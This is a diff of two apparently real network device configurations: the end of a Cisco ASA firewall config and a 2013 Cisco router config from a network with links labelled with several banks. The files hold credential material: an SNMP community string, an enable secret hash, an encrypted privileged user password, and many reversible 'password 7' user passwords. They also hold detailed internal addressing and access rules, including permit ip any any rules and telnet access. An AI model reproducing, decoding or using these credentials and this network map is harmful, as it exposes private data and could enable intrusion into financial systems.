+object-group service DM_INLINE_SERVICE_4
+ service-object tcp eq 8401 
+ service-object udp eq 8401 
+object-group network en.More_Web_Servers
+ network-object host en.MoreWebSRVR1
+object-group network DM_INLINE_NETWORK_19
+ group-object en.More-srvr
+ group-object en.More-srvr_ref
+object-group network DM_INLINE_NETWORK_20
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group service ReportingSvc tcp
+ port-object eq 1111
+object-group service DM_INLINE_SERVICE_5
+ service-object tcp eq 135 
+ service-object tcp eq 137 
+ service-object tcp eq 138 
+ service-object tcp eq 1433 
+ service-object tcp eq 1434 
+ service-object tcp eq ftp 
+ service-object udp eq 135 
+ service-object tcp range 5000 5100 
+ service-object tcp eq 3372 
+ service-object tcp eq 445 
+ service-object udp eq 139 
+ service-object udp eq 1434 
+ service-object tcp eq 3389 
+ service-object tcp eq 1111 
+object-group service DM_INLINE_SERVICE_6
+ service-object tcp eq 1111 
+ service-object tcp eq 135 
+ service-object tcp eq 137 
+ service-object tcp eq 138 
+ service-object tcp range 5000 5100 
+ service-object tcp eq https 
+ service-object tcp eq ssh 
+ service-object udp eq 135 
+ service-object tcp eq 1433 
+ service-object tcp eq 1434 
+ service-object tcp eq 3372 
+ service-object tcp eq 445 
+ service-object udp eq 139 
+ service-object udp eq 1434 
+ service-object tcp eq 3389 
+object-group network RemitONE-Srvrs
+ network-object host RemitONE-Test_Srvr1
+ network-object host RemitONE-Srvr1
+ network-object host RemitONE-Srvr2
+ network-object host RemitONE-Srvr3
+object-group network DM_INLINE_NETWORK_21
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_22
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_23
+ network-object host 192.168.206.188
+ network-object host 192.168.206.189
+object-group network DM_INLINE_NETWORK_24
+ network-object host 192.168.214.10
+ network-object host 192.168.214.11
+object-group network DM_INLINE_NETWORK_25
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_26
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group service DM_INLINE_TCP_12 tcp
+ port-object eq www
+ port-object eq https
+object-group network DM_INLINE_NETWORK_27
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+object-group network DM_INLINE_NETWORK_28
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+object-group service DM_INLINE_TCP_13 tcp
+ port-object eq www
+ port-object eq https
+access-list clients_access_in remark Allow en.More Level 3 MGMT Group to access en.More APP Servers
+access-list clients_access_in extended permit tcp 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_27 object-group DM_INLINE_TCP_13 
+access-list clients_access_in remark Deny any traffic from en.More Level 3 MGMT Group
+access-list clients_access_in extended deny ip 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_28 
+access-list clients_access_in remark Allow en.More Level 3 MGMT Group to access en.More Servers
+access-list clients_access_in extended permit tcp 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_25 object-group DM_INLINE_TCP_12 
+access-list clients_access_in remark Deny any traffic from en.More Level 3 MGMT Group
+access-list clients_access_in extended deny ip 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_26 
+access-list clients_access_in remark Allow HTTPS from RemitONE to en.More-srvr4
+access-list clients_access_in extended permit tcp object-group RemitONE-Srvrs object-group DM_INLINE_NETWORK_21 eq https 
+access-list clients_access_in remark Deny any traffic from RemitONE to en.More-srvr4 for Security
+access-list clients_access_in extended deny ip object-group RemitONE-Srvrs object-group DM_INLINE_NETWORK_22 
+access-list clients_access_in extended permit icmp any any 
+access-list clients_access_in extended permit tcp any object-group sag-servers-prod eq 48002 
+access-list clients_access_in extended permit tcp any object-group sag-servers-prod eq 48003 
+access-list clients_access_in extended permit tcp object-group en.More_Customers object-group en.More-srvr_ref eq www 
+access-list clients_access_in extended permit tcp object-group DM_INLINE_NETWORK_7 object-group en.More-srvr_ref object-group DM_INLINE_TCP_2 
+access-list clients_access_in extended permit tcp object-group en.More_Customers object-group ftp-srv_ref-clients object-group DM_INLINE_TCP_7 
+access-list clients_access_in extended permit tcp any object-group ftp-srv_ref-clients object-group DM_INLINE_TCP_6 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group FEBKUS6L-ws-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group GPSXUS55-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group IDXDUS33-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group RBBCUS6L-ws-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group CAGPBMHM-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 host ensb-us-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit tcp ensb-us-nw 255.255.255.0 object-group sharedsaa-saa-group eq 3389 
+access-list clients_access_in extended permit tcp ensb-mgmt-nw 255.255.255.0 object-group sharedsaa-saa-group eq 3389 
+access-list clients_access_in remark disconnect
+access-list clients_access_in extended permit tcp unirisx-mgmt-nw 255.255.255.0 object-group unirisx-srv-group eq 3389 inactive 
+access-list clients_access_in extended permit ip object-group FEBKUS6L-ws-nw ensb-dxb-nw 255.255.255.0 inactive 
+access-list clients_access_in remark USA DC access to DXB DC
+access-list clients_access_in extended permit ip ensb-us-nw 255.255.255.0 ensb-dxb-nw 255.255.255.0 
+access-list clients_access_in remark Unirisx Customer - disconnect
+access-list clients_access_in extended permit tcp any object-group unirisx-srv-group object-group web-ports inactive 
+access-list clients_access_in remark Unirisx Customer - disconnect
+access-list clients_access_in extended permit tcp any object-group unirisx-srv-group eq ftp inactive 
+access-list clients_access_in remark Unirisx Customer - disconnect
+access-list clients_access_in extended permit icmp any object-group unirisx-srv-group inactive 
+access-list clients_access_in remark Unirisx Keysrv - disconnect
+access-list clients_access_in extended permit tcp host UNIRISX-KEYSRV object-group unirisx-srv-group object-group Unirisx-Keysrv inactive 
+access-list clients_access_in remark ENSB mgmt
+access-list clients_access_in extended permit ip ensb-mgmt-nw 255.255.255.0 any 
+access-list clients_access_in remark disconnect
+access-list clients_access_in extended permit tcp unirisx-pharos-nw 255.255.255.0 host 192.168.211.203 eq 3389 inactive 
+access-list clients_access_in extended permit tcp finmex-mgmt-nw 255.255.255.0 host 192.168.211.100 eq 3389 
+access-list clients_access_in extended permit tcp finmex-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_8 object-group DM_INLINE_TCP_8 
+access-list clients_access_in remark Access List between en.More Web Server and en.More Servers
+access-list clients_access_in extended permit object-group DM_INLINE_SERVICE_5 object-group en.More_Web_Servers object-group DM_INLINE_NETWORK_19 
+access-list clients_access_in remark Access List between en.More Web Server and en.More Servers (reporting Service) (AD-06JUN2012)
+access-list clients_access_in extended permit tcp object-group en.More_Web_Servers object-group DM_INLINE_NETWORK_20 object-group ReportingSvc 
+access-list clients_access_in remark Publish enMore Internet (requested by HM). AD.
+access-list clients_access_in extended permit tcp any object-group DM_INLINE_NETWORK_9 object-group DM_INLINE_TCP_9 
+access-list clients_access_in remark Publish enMore ftp Internet. To be enabled when needed only. AD.
+access-list clients_access_in extended permit tcp any object-group DM_INLINE_NETWORK_10 object-group DM_INLINE_TCP_10 
+access-list clients_access_in remark FOR TESTING PURPOSES ONLY. DISABLE AFTER TESTING
+access-list clients_access_in extended permit tcp any object-group DM_INLINE_NETWORK_11 object-group DM_INLINE_TCP_11 inactive 
+access-list clients_access_in extended permit icmp any host 192.168.211.100 
+access-list clients_access_in extended permit tcp any host 192.168.211.100 object-group web-ports 
+access-list clients_access_in extended permit tcp any host 192.168.211.100 eq ftp 
+access-list clients_access_in extended permit tcp object-group CAGPBMHM-nw object-group CAPG-SRV-GROUP-NAT object-group DM_INLINE_TCP_1 
+access-list clients_access_in extended permit tcp object-group CAGPBMHM-NW-DR object-group CAPG-SRV-GROUP-NAT object-group DM_INLINE_TCP_3 
+access-list clients_access_in extended permit ip ensb-jo-nw 255.255.255.0 ensb-dxb-nw 255.255.255.0 
+access-list clients_access_in extended permit ip nw-sslvpn-nw 255.255.255.0 ensb-dxb-nw 255.255.255.0 
+access-list clients_access_in remark disabled April 1, 2013
+access-list clients_access_in extended permit tcp any any eq 30003 inactive 
+access-list clients_access_in remark disabled April 1, 2013
+access-list clients_access_in extended permit udp any any eq 30003 inactive 
+access-list clients_access_in extended permit udp any object-group en.More-srvr_ref eq nameserver 
+access-list clients_access_in extended permit object-group DM_INLINE_SERVICE_3 host 172.28.0.0 object-group swp-srvrs 
+access-list clients_access_in extended permit tcp cs-support-nw 255.255.255.0 host enMORE-srvr1 eq www 
+access-list clients_access_in extended permit tcp cs-support-nw 255.255.255.0 host enMORE-srvr1 eq https 
+access-list clients_access_in extended permit ip host en.MoreWebSRVR1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list clients_access_in extended permit icmp host en.MoreWebSRVR1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list sag_access_in extended permit icmp any object-group en.More-srvr 
+access-list sag_access_in extended permit ip any object-group en.More-srvr 
+access-list sag_access_in extended permit icmp any any 
+access-list sag_access_in extended permit tcp any any eq 3389 
+access-list sag_access_in extended permit ip any any 
+access-list swift_access_in extended permit ip any any 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group CAGP-SRV-GROUP object-group CAGPBMHM-nw object-group msih-ports inactive 
+access-list Hosting extended permit icmp 192.168.209.0 255.255.255.0 ensb-us-nw 255.255.255.0 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 ensb-us-nw 255.255.255.0 eq 3389 
+access-list Hosting extended permit icmp 192.168.209.0 255.255.255.0 any 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 object-group sag-servers-prod eq 48002 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 object-group sag-servers-prod eq 48003 
+access-list Hosting extended permit object-group TCPUDP object-group sharedsaa-saa-group object-group FEBKUS6L-ws-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group IDXDUS33-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group RBBCUS6L-ws-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group GPSXUS55-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group CAGPBMHM-nw object-group msih-ports 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 any object-group FMSIH-PRINT-TCP 
+access-list Hosting extended permit ip 192.168.209.0 255.255.255.0 any log 
+access-list Hosting extended permit ip ensb-dxb-nw 255.255.255.0 ensb-jo-nw 255.255.255.0 
+access-list Hosting remark test only
+access-list Hosting extended permit ip any any inactive 
+access-list Hosting extended permit ip host 192.168.211.31 any inactive 
+access-list Hosting extended permit icmp host 192.168.211.31 any inactive 
+access-list Hosting extended permit ip 192.168.209.0 255.255.255.0 192.168.200.0 255.255.255.0 
+access-list Hosting extended permit icmp 192.168.209.0 255.255.255.0 192.168.200.0 255.255.255.0 
+access-list Hosting extended permit icmp any any 
+access-list unirisx_access_in remark keyserver.hostidp.com on TCP port 18021
+access-list unirisx_access_in extended permit tcp host unirisx-srv1 host UNIRISX-KEYSRV object-group Unirisx-Keysrv 
+access-list unirisx_access_in remark DNS for host. AD
+access-list unirisx_access_in extended permit udp host unirisx-srv1 any eq domain 
+access-list unirisx_access_in extended permit ip 192.168.213.0 255.255.255.0 any 
+access-list unirisx_access_in extended permit icmp 192.168.213.0 255.255.255.0 any 
+access-list mgmt_access_in extended permit icmp ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_2 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_1 
+access-list mgmt_access_in extended permit icmp ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_3 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_4 
+access-list mgmt_access_in extended permit icmp any any 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_13 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_14 
+access-list mgmt_access_in extended permit tcp host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list mgmt_access_in extended permit tcp host enMORE-srvr2 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list mgmt_access_in extended permit udp host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list mgmt_access_in extended permit udp host enMORE-srvr2 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list mgmt_access_in extended permit ip host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list mgmt_access_in extended permit ip host enMORE-srvr3 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list mgmt_access_in extended permit ip host enMORE-srvr4 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 host en.MoreWebSRVR1 
+access-list mgmt_access_in extended permit icmp ensb-dxb-mgmt-nw 255.255.255.0 host en.MoreWebSRVR1 
+access-list finmex_access_in remark Tempo Access List to update windows
+access-list finmex_access_in extended permit tcp host enMORE-srvr4 object-group RemitONE-Srvrs eq https 
+access-list finmex_access_in extended permit ip host finmex-srv1 finmex-mgmt-nw 255.255.255.0 
+access-list finmex_access_in extended permit tcp host finmex-srv1 any object-group web-ports 
+access-list finmex_access_in extended permit tcp host finmex-srv1 any eq ftp 
+access-list finmex_access_in extended permit object-group DM_INLINE_PROTOCOL_2 host finmex-srv1 any eq domain 
+access-list finmex_access_in extended permit icmp host finmex-srv1 any 
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_1 host finmex-srv1 object-group DM_INLINE_NETWORK_5 
+access-list finmex_access_in remark Access List between en.More Servers and en.More Web Server
+access-list finmex_access_in extended permit ip object-group en.More-srvr object-group en.More_Web_Servers inactive 
+access-list finmex_access_in remark Access List between en.More Servers and en.More Web Server
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_6 object-group en.More-srvr object-group en.More_Web_Servers 
+access-list finmex_access_in extended permit icmp object-group en.More-srvr host 192.168.214.245 
+access-list finmex_access_in extended permit tcp host enMORE-srvr1 host SL1 eq ftp inactive 
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_4 object-group en.More-srvr object-group DM_INLINE_NETWORK_23 
+access-list finmex_access_in extended permit icmp object-group en.More-srvr any 
+access-list finmex_access_in extended permit icmp host enMORE-srvr2 any inactive 
+access-list finmex_access_in extended permit ip object-group en.More-srvr ensb-dxb-mgmt-nw 255.255.255.0 inactive 
+access-list finmex_access_in extended permit tcp object-group en.More-srvr object-group DM_INLINE_NETWORK_6 object-group DM_INLINE_TCP_4 
+access-list finmex_access_in remark Internet Access - For Licensing Only. To be disabled after use. AD
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_2 object-group en.More-srvr any inactive 
+access-list finmex_access_in remark Internet Access - For Licensing Only. To be disabled after use. AD
+access-list finmex_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group en.More-srvr any eq domain inactive 
+access-list finmex_access_in extended permit tcp object-group en.More-srvr object-group ftp-srv_ref-finmex object-group DM_INLINE_TCP_5 
+access-list finmex_access_in remark Internet Access - For Licensing Only. To be disabled after use. AD
+access-list finmex_access_in extended permit tcp object-group en.More-srvr any eq ftp inactive 
+access-list finmex_access_in extended permit ip object-group en.More-srvr object-group ftp-srv_ref-finmex 
+access-list finmex_access_in extended permit tcp object-group DM_INLINE_NETWORK_15 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list finmex_access_in extended permit tcp object-group DM_INLINE_NETWORK_16 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list finmex_access_in extended permit udp object-group DM_INLINE_NETWORK_17 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list finmex_access_in extended permit udp object-group DM_INLINE_NETWORK_18 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list finmex_access_in extended permit ip host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list finmex_access_in extended permit ip object-group DM_INLINE_NETWORK_12 object-group DM_INLINE_NETWORK_24 
+pager lines 20
+logging enable
+logging asdm errors
+mtu clients 1500
+mtu host 1500
+mtu sag 1500
+mtu unirisx 1500
+mtu mgmt 1500
+mtu finmex 1500
+failover
+failover lan unit primary
+icmp unreachable rate-limit 1 burst-size 1
+icmp permit any finmex
+asdm image flash:/asdm-602.bin
+asdm location sag-srv2 255.255.255.255 sag
+asdm location sagfin1 255.255.255.255 sag
+asdm location vpn1-int 255.255.255.255 clients
+asdm location vpn2-int 255.255.255.255 clients
+asdm location vpn1-2-nsrp 255.255.255.255 clients
+asdm location sagsns1 255.255.255.255 sag
+asdm group sag-servers-prod sag
+asdm group ensb-vpns-group clients
+asdm group sag-srv-test sag
+asdm group sag-servers-prod_ref clients reference sag-servers-prod
+asdm group ensb-dxb-nw clients
+no asdm history enable
+arp timeout 14400
+static (host,clients) host-srv1 ensbusl1 netmask 255.255.255.255 
+static (host,clients) host-srv2 ensbusl2 netmask 255.255.255.255 
+static (host,clients) host-srv3 ensbusl3 netmask 255.255.255.255 
+static (unirisx,clients) 192.168.211.201 unirisx-srv1 netmask 255.255.255.255 
+static (unirisx,clients) 192.168.211.202 unirisx-srv2 netmask 255.255.255.255 
+static (unirisx,clients) 192.168.211.203 unirisx-srv3 netmask 255.255.255.255 
+static (host,sag) 192.168.202.50 host-srv1 netmask 255.255.255.255 
+static (host,sag) 192.168.202.51 host-srv2 netmask 255.255.255.255 
+static (host,sag) 192.168.202.52 host-srv3 netmask 255.255.255.255 
+static (sag,finmex) 192.168.214.25 sagfin2 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.22 sagsns1 netmask 255.255.255.255 
+static (finmex,clients) 192.168.211.100 finmex-srv1 netmask 255.255.255.255 
+static (finmex,sag) finmex-srv1 finmex-srv1 netmask 255.255.255.255 
+static (mgmt,finmex) 192.168.214.10 192.168.208.10 netmask 255.255.255.255 
+static (mgmt,finmex) 192.168.214.11 192.168.208.11 netmask 255.255.255.255 
+static (finmex,clients) 192.168.211.105 enMORE-srvr1 netmask 255.255.255.255 
+static (host,finmex) SL1 host-srv2 netmask 255.255.255.255 
+static (finmex,clients) 192.168.211.106 enMORE-srvr2 netmask 255.255.255.255 
+static (sag,host) 192.168.209.25 sagfin1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.25 sag-srv2 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.208 192.168.200.208 netmask 255.255.255.255 
+static (sag,host) 192.168.209.208 192.168.200.208 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.21 sagtest1 netmask 255.255.255.255 
+static (sag,finmex) 192.168.214.21 sagtest1 netmask 255.255.255.255 
+static (sag,host) 192.168.209.21 sagtest1 netmask 255.255.255.255 
+static (sag,host) 192.168.209.22 sagsns1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.115 enFTP1 netmask 255.255.255.255 
+static (sag,finmex) 192.168.214.245 enFTP1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.111 192.168.202.11 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.28 swp-srv1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.29 swp-srv2 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.30 swp-nlb netmask 255.255.255.255 
+static (host,clients) 192.168.211.31 CAGP-SRV2 netmask 255.255.255.255 
+static (host,clients) 192.168.211.32 CAGP-SRV1 netmask 255.255.255.255 
+static (finmex,clients) enMORE-srvr3 enMORE-srvr3 netmask 255.255.255.255 
+static (finmex,clients) enMORE-srvr4 enMORE-srvr4 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.101 ensbdrsa2 netmask 255.255.255.255 
+access-group clients_access_in in interface clients
+access-group Hosting in interface host
+access-group sag_access_in in interface sag
+access-group unirisx_access_in in interface unirisx
+access-group mgmt_access_in in interface mgmt
+access-group finmex_access_in in interface finmex
+route clients 0.0.0.0 0.0.0.0 vpn1-2-nsrp 1
+route sag 10.149.11.0 255.255.255.0 192.168.202.1 1
+route clients ensb-us-nw 255.255.255.0 vpn1-2-nsrp 1
+route sag 192.168.200.0 255.255.255.0 192.168.202.1 2
+route sag ensb-dxb-mgmt-nw 255.255.255.0 192.168.202.1 5
+route sag 192.168.216.22 255.255.255.255 192.168.202.1 2
+route sag 192.168.216.25 255.255.255.255 192.168.202.1 2
+route sag 192.168.216.33 255.255.255.255 192.168.202.1 2
+route sag 192.168.218.0 255.255.255.0 192.168.202.1 2
+route clients BICs-HomeSend-Prod 255.255.255.255 vpn1-2-nsrp 1
+route clients BICs-HomeSend-Test 255.255.255.255 vpn1-2-nsrp 1
+timeout xlate 3:00:00
+timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
+timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
+timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
+timeout uauth 0:05:00 absolute
+dynamic-access-policy-record DfltAccessPolicy
+http server enable
+http ensb-dxb-mgmt-nw 255.255.255.0 mgmt
+http 192.168.202.0 255.255.255.0 sag
+http 192.168.209.0 255.255.255.0 host
+snmp-server host mgmt 192.168.208.11 community ^enSBSXstr1ng^
+no snmp-server location
+no snmp-server contact
+snmp-server enable traps snmp authentication linkup linkdown coldstart
+no crypto isakmp nat-traversal
+telnet 192.168.209.0 255.255.255.0 host
+telnet 192.168.202.0 255.255.255.0 sag
+telnet ensb-dxb-mgmt-nw 255.255.255.0 mgmt
+telnet timeout 5
+ssh 192.168.208.11 255.255.255.255 mgmt
+ssh timeout 5
+console timeout 0
+threat-detection basic-threat
+threat-detection statistics access-list
+!
+class-map inspection_default
+ match default-inspection-traffic
+!
+!
+policy-map type inspect dns preset_dns_map
+ parameters
+  message-length maximum 512
+policy-map global_policy
+ class inspection_default
+  inspect dns preset_dns_map 
+  inspect ftp 
+  inspect h323 h225 
+  inspect h323 ras 
+  inspect netbios 
+  inspect rsh 
+  inspect rtsp 
+  inspect skinny  
+  inspect esmtp 
+  inspect sqlnet 
+  inspect sunrpc 
+  inspect tftp 
+  inspect sip  
+  inspect xdmcp 
+!
+service-policy global_policy global
+tftp-server mgmt 192.168.208.10 /
+username kbaluyot password veUjjfuhoN5j6Rty encrypted privilege 15
+prompt hostname context 
+Cryptochecksum:a508ad9b1810225f994cba72202c421f
+: end

swift/00555_0_ensbdrtr1-2013aug09

@@ -0,0 +1,780 @@
+
+!
+! Last configuration change at 00:55:54 UTC Fri May 10 2013 by ensb
+! NVRAM config last updated at 00:58:44 UTC Fri May 10 2013 by ensb
+!
+version 12.4
+service timestamps debug uptime
+service timestamps log datetime localtime
+service password-encryption
+!
+hostname ENSBDRTR1
+!
+boot-start-marker
+boot system flash:c3825-ipbase-mz.124-24.T5.bin
+boot-end-marker
+!
+card type e1 1
+logging message-counter syslog
+logging buffered 4096
+enable secret 5 $1$85QF$0zprzPbrh20noxfLqUzNJ1
+enable password 7 045819560C71481F054A
+!
+aaa new-model
+!
+!
+aaa authentication login default local
+aaa authentication ppp default local
+!
+!
+aaa session-id common
+no network-clock-participate slot 1 
+!
+ip source-route
+ip cef
+!
+!
+!
+!
+no ip domain lookup
+multilink bundle-name authenticated
+isdn switch-type basic-net3
+!
+!
+!
+username admin password 7 0307495B055F251D420C
+username ensb password 7 047E0A151B0F495A1A
+username ENSBBRTR1 password 7 094D5D0D1F0404160D
+username Router password 7 106B080A1139171F1F
+username HQ-AS-1 password 7 123C04040625091039
+username ENSBPRTR1 password 7 11584B56
+username ENSBDRTR1 password 7 12485744
+username ensbpk password 7 094F471A1A0A
+username asdf1 password 7 094F471A1A0A
+username abc password 7 104F0B1A
+username OASIS-INTERNET-ROUTER password 7 08044D5D1D37160301
+username HQR4 password 7 09694F1A0D2B120618
+username cbom password 7 045809560271415C1C
+archive
+ log config
+  hidekeys
+!
+!
+controller E1 1/0
+ framing NO-CRC4 
+ pri-group timeslots 1-31
+!
+controller E1 1/1
+!
+!
+!
+!
+interface Loopback0
+ no ip address
+!
+interface Loopback1
+ description For PSTN Dialin Interface
+ ip address 10.92.115.1 255.255.255.128
+!
+interface GigabitEthernet0/0
+ description Connected to MPLS line (207)
+ no ip address
+ duplex auto
+ speed auto
+ media-type rj45
+!
+interface GigabitEthernet0/0.1
+ description MPLS-1-207
+ encapsulation dot1Q 18
+ ip address 192.168.207.139 255.255.255.248
+!
+interface GigabitEthernet0/0.2
+ description MPLS-2-215
+ encapsulation dot1Q 225
+ ip address 192.168.215.139 255.255.255.240
+!
+interface GigabitEthernet0/1
+ description connected to EthernetLAN
+ no ip address
+ duplex auto
+ speed auto
+ media-type rj45
+!
+interface GigabitEthernet0/1.1
+ description Dialin-1 Network 
+ encapsulation dot1Q 207
+ ip address 192.168.207.1 255.255.255.192
+!
+interface GigabitEthernet0/1.2
+ description Dialin-2 Network
+ encapsulation dot1Q 215
+ ip address 192.168.215.1 255.255.255.224
+!
+interface Serial0/0/0
+ description BANK MELLI IRAN
+ ip address 10.10.33.18 255.255.255.252
+ encapsulation ppp
+!
+interface Serial0/0/1
+ description SHARJAH ISLAMIC BANK
+ ip address 10.10.201.1 255.255.255.252
+ encapsulation ppp
+!
+interface Serial0/1/0
+ description KIAKKWKW IPLC
+ ip address 172.16.1.2 255.255.255.252
+!
+interface Serial0/1/1
+ no ip address
+ clock rate 2000000
+!
+interface Serial1/0:15
+ description connected to Dial-inPCs PRI)
+ ip address 10.91.116.1 255.255.255.128
+ encapsulation ppp
+ no ip split-horizon
+ dialer idle-timeout 10000
+ dialer-group 102
+ isdn switch-type primary-net5
+ peer default ip address pool ENSBDRTR1-PRI
+ no cdp enable
+ ppp authentication pap
+!
+interface BRI2/0
+ description connected to Dial-inPCs(ISDN)
+ no ip address
+ encapsulation ppp
+ dialer pool-member 1
+ dialer pool-member 2
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/1
+ description connected to Dial-inPCs(ISDN)_1
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 2
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/2
+ description connected to Dial-inPCs(ISDN)_2
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 3
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/3
+ description connected to Dial-inPCs(ISDN)_3
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 4
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/4
+ description connected to Dial-inPCs(ISDN)_4
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 5
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/5
+ description connected to Dial-inPCs(ISDN)_5
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 6
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/6
+ description connected to Dial-inPCs(ISDN)_6
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 7
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/7
+ description connected to Dial-inPCs(ISDN)_7
+ no ip address
+ encapsulation ppp
+ dialer pool-member 1
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap
+!
+interface Async0/322
+ no ip address
+ encapsulation slip
+!
+interface Async0/323
+ no ip address
+ encapsulation slip
+!
+interface Async0/324
+ no ip address
+ encapsulation slip
+!
+interface Async0/325
+ no ip address
+ encapsulation slip
+!
+interface Async0/326
+ no ip address
+ encapsulation slip
+!
+interface Async0/327
+ no ip address
+ encapsulation slip
+!
+interface Async0/328
+ no ip address
+ encapsulation slip
+!
+interface Async0/329
+ no ip address
+ encapsulation slip
+!
+interface Async0/330
+ no ip address
+ encapsulation slip
+!
+interface Async0/331
+ no ip address
+ encapsulation slip
+!
+interface Async0/332
+ no ip address
+ encapsulation slip
+!
+interface Async0/333
+ no ip address
+ encapsulation slip
+!
+interface Async0/334
+ no ip address
+ encapsulation slip
+!
+interface Async0/335
+ no ip address
+ encapsulation slip
+!
+interface Async0/336
+ no ip address
